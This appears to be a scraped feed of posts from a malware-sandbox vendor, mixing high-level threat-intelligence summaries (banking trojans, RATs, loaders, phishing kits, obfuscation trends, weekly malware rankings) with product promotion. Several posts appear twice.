🔍 Fresh, actionable threat intelligence for security leaders.
This report covers three high-impact malware families affecting Windows and mobile environments:
🔹 Albiriox, an Android banking trojan offered as MaaS, combining VNC-based remote control and overlays to bypass protections in 400+ financial apps.
🔹 OctoRAT, a .NET-based Windows RAT with UAC bypass, credential theft, proxying, and full remote control for long-term access.
🔹 GuLoader, a downloader using heavily obfuscated PowerShell, shellcode, and process injection to deliver RATs and infostealers.
👨💻 Explore an exclusive report with IOCs, YARA, and detection insights in the TI Lookup Premium plan.
New to TI Lookup? Start a trial to explore more in-depth analyses of active threats and APTs.
This report covers three high-impact malware families affecting Windows and mobile environments:
🔹 Albiriox, an Android banking trojan offered as MaaS, combining VNC-based remote control and overlays to bypass protections in 400+ financial apps.
🔹 OctoRAT, a .NET-based Windows RAT with UAC bypass, credential theft, proxying, and full remote control for long-term access.
🔹 GuLoader, a downloader using heavily obfuscated PowerShell, shellcode, and process injection to deliver RATs and infostealers.
👨💻 Explore an exclusive report with IOCs, YARA, and detection insights in the TI Lookup Premium plan.
New to TI Lookup? Start a trial to explore more in-depth analyses of active threats and APTs.
❤8
🧠 SOAR works differently once alerts come with proof.
Integrating a sandbox into SOAR shows real behavior early, shortens MTTR, and cuts Tier 1 workload by up to 20%.
👉 Check out how this works in practice
Integrating a sandbox into SOAR shows real behavior early, shortens MTTR, and cuts Tier 1 workload by up to 20%.
👉 Check out how this works in practice
❤6🔥2
88% of threats are visible in 60 seconds ⚡️ #ANYRUN’s Enterprise plan is built for organizations where missing a threat isn’t an option.
📈 Equip your SOC with early detection and rapid response for stronger defense and improved performance. Explore all the benefits for your team
📈 Equip your SOC with early detection and rapid response for stronger defense and improved performance. Explore all the benefits for your team
❤9🔥1
🚨 Top Malware Obfuscation Techniques Observed in December
📈 We’ve tracked the most common obfuscation techniques that help threats slip past detection, slow down investigations, and stay active longer. Knowing which techniques attackers rely on most helps security teams prioritize detections that cover real-world attacker behavior, reducing alert noise and improving MTTD/MTTR.
1️⃣ Living-off-the-Land Binaries: 8,568 detections
Attackers abuse legitimate built-in system utilities such as msbuild.exe, certutil.exe, msiexec.exe, and regsvr32.exe to download, decode, and execute malicious payloads.
Because these binaries are trusted and widely used, their activity often looks legitimate at first glance, making LOLBin abuse hard for SOC teams to spot without behavioral context.
🔍 Explore examples and related activity using this TI Lookup search query
2️⃣ Advanced Packers and Multi-Layer Obfuscation: 6,908 detections
Malware increasingly uses packers such as UPX, as well as advanced or custom solutions like VMProtect, Themida, or proprietary loaders.
These samples apply multiple layers of encryption, anti-debugging, and sandbox checks. Payloads are unpacked gradually and only under specific conditions, slowing down analysis and detection.
🔍 Find examples in TI Lookup
3️⃣ String and API Call Obfuscation: 6,336 detections
Critical strings such as C2 URLs, function names, and file paths are stored in encrypted or fragmented form and reconstructed only at runtime.
API calls are often resolved dynamically, for example by hashing function names and resolving them via GetProcAddress, making static detection significantly harder.
🔍 Find examples in TI Lookup
4️⃣ In-Memory and Fileless Obfuscation: 2,395 detections
Malware minimizes or completely avoids writing payloads to disk. Instead, the core code is loaded directly into memory using legitimate mechanisms such as PowerShell, WMI, .NET Assembly Reflection, or process injection techniques like Process Hollowing.
Attackers also heavily rely on complex noscript transformations: variable name randomization, string fragmentation, and non-obvious language constructs.
🔍 Find examples in TI Lookup
🚀 Speed up detection and gain full visibility into complex threats with #ANYRUN. Sign up
#ExploreWithANYRUN
📈 We’ve tracked the most common obfuscation techniques that help threats slip past detection, slow down investigations, and stay active longer. Knowing which techniques attackers rely on most helps security teams prioritize detections that cover real-world attacker behavior, reducing alert noise and improving MTTD/MTTR.
1️⃣ Living-off-the-Land Binaries: 8,568 detections
Attackers abuse legitimate built-in system utilities such as msbuild.exe, certutil.exe, msiexec.exe, and regsvr32.exe to download, decode, and execute malicious payloads.
Because these binaries are trusted and widely used, their activity often looks legitimate at first glance, making LOLBin abuse hard for SOC teams to spot without behavioral context.
🔍 Explore examples and related activity using this TI Lookup search query
2️⃣ Advanced Packers and Multi-Layer Obfuscation: 6,908 detections
Malware increasingly uses packers such as UPX, as well as advanced or custom solutions like VMProtect, Themida, or proprietary loaders.
These samples apply multiple layers of encryption, anti-debugging, and sandbox checks. Payloads are unpacked gradually and only under specific conditions, slowing down analysis and detection.
🔍 Find examples in TI Lookup
3️⃣ String and API Call Obfuscation: 6,336 detections
Critical strings such as C2 URLs, function names, and file paths are stored in encrypted or fragmented form and reconstructed only at runtime.
API calls are often resolved dynamically, for example by hashing function names and resolving them via GetProcAddress, making static detection significantly harder.
🔍 Find examples in TI Lookup
4️⃣ In-Memory and Fileless Obfuscation: 2,395 detections
Malware minimizes or completely avoids writing payloads to disk. Instead, the core code is loaded directly into memory using legitimate mechanisms such as PowerShell, WMI, .NET Assembly Reflection, or process injection techniques like Process Hollowing.
Attackers also heavily rely on complex noscript transformations: variable name randomization, string fragmentation, and non-obvious language constructs.
🔍 Find examples in TI Lookup
🚀 Speed up detection and gain full visibility into complex threats with #ANYRUN. Sign up
#ExploreWithANYRUN
❤8
🚨 XWorm is up +174% in Q4 25, while Storm1747 increased its activity by 51%.
Explore major threats, TTPs, and APTs in our latest threat landscape report powered by data from 15K SOCs.
👉 Use this intel now to prevent incidents later
Explore major threats, TTPs, and APTs in our latest threat landscape report powered by data from 15K SOCs.
👉 Use this intel now to prevent incidents later
❤6🔥1
🚨 Tykit phishing kit is targeting hundreds of US & EU companies, stealing Microsoft 365 credentials using malicious SVG files and bypassing MFA through AitM attacks.
👾 View Tykit sample analysis
👉 Learn how this PhaaS works, who's being targeted, and how to defend your organization.
👾 View Tykit sample analysis
👉 Learn how this PhaaS works, who's being targeted, and how to defend your organization.
❤5👍2🔥1
👨💻 How to turn threat data overload into better defense?
Build stronger security with unique, real-time TI Feeds. Keep your SIEM, XDR, TIP up-to-date with filtered malicious IPs, domains, and URLs that you can trust.
📈 See all the benefits for your security team
Build stronger security with unique, real-time TI Feeds. Keep your SIEM, XDR, TIP up-to-date with filtered malicious IPs, domains, and URLs that you can trust.
📈 See all the benefits for your security team
❤7
📈️ Clients don’t leave MSSPs because attacks happen.
They leave because they can’t see the value.
👉 Here’s how you can prove impact and retain customers in 2026/a>
They leave because they can’t see the value.
👉 Here’s how you can prove impact and retain customers in 2026/a>
👍8
👨💻 All key challenges of SOCs, from low detection rates to overwhelming alert backlogs, can be tackled with threat intelligence.
👉 See how to achieve faster triage and 3x higher performance
👉 See how to achieve faster triage and 3x higher performance
❤5👍1
Top 10 last week's threats by uploads 🌐
⬆️ #Xworm 563 (350)
⬆️ #Asyncrat 335 (176)
⬆️ #Warzone 289 (35)
⬆️ #Gh0st 241 (14)
⬆️ #Stealc 216 (180)
⬆️ #Quasar 211 (159)
⬆️ #Vidar 204 (184)
⬆️ #Remcos 169 (40)
⬇️ #Lumma 139 (167)
⬆️ #Reverseloader 108 (21)
👉 Explore malware in action
#Top10Malware
⬆️ #Xworm 563 (350)
⬆️ #Asyncrat 335 (176)
⬆️ #Warzone 289 (35)
⬆️ #Gh0st 241 (14)
⬆️ #Stealc 216 (180)
⬆️ #Quasar 211 (159)
⬆️ #Vidar 204 (184)
⬆️ #Remcos 169 (40)
⬇️ #Lumma 139 (167)
⬆️ #Reverseloader 108 (21)
👉 Explore malware in action
#Top10Malware
❤6👾3
🚨 Discover how Salat Stealer exfiltrates sensitive data via UPX-packed payloads, session hijacking, and real-time surveillance while operating as a low-cost MaaS threat.
👉 Learn detection, prevention, traffic and behavior analysis
👉 Learn detection, prevention, traffic and behavior analysis
❤7👾2
Phishing activity in the past 7 days 🐟
👉 Track latest phishing threats in TI Lookup
#TopPhishingThreats
👉 Track latest phishing threats in TI Lookup
#TopPhishingThreats
👾5❤2
⚠️ In Q4 2025, XWorm surged 174%, fueled by its flexibility across manufacturing and healthcare.
AsyncRAT and Quasar followed with 46% and 27% growth, showing open-source RATs outpacing commercial stealers.
📈 See key threats, TTPs, and APT trends in our latest threat landscape report, powered by data from 15K SOCs.
AsyncRAT and Quasar followed with 46% and 27% growth, showing open-source RATs outpacing commercial stealers.
📈 See key threats, TTPs, and APT trends in our latest threat landscape report, powered by data from 15K SOCs.
❤6🔥1
🚨 CastleLoader attacks government agencies, compromising up to 400+ devices at once.
Its unusual process hollowing via an AutoIt3 noscript is hard for EDR to detect.
👉 See full analysis with extracted runtime config, C2s, and IOCs.
Its unusual process hollowing via an AutoIt3 noscript is hard for EDR to detect.
👉 See full analysis with extracted runtime config, C2s, and IOCs.
❤6🔥1👏1
📈 Improve your security KPIs by integrating #ANYRUN TI Feeds into your SIEM/XDR via STIX/TAXII.
Get fresh indicators from real-world attacks on 15K+ orgs, increasing detection accuracy, cutting dwell time, and reducing alert fatigue.
🚀 See how it works
Get fresh indicators from real-world attacks on 15K+ orgs, increasing detection accuracy, cutting dwell time, and reducing alert fatigue.
🚀 See how it works
❤5🔥1
🪝 We tracked a phishing campaign against Germany's largest manufacturing enterprise.
It abuses a CVE, delivers AsyncRAT, and has a low detection rate among most AV engines.
👉 Get actionable intel to detect it early
It abuses a CVE, delivers AsyncRAT, and has a low detection rate among most AV engines.
👉 Get actionable intel to detect it early
❤5🔥2👾2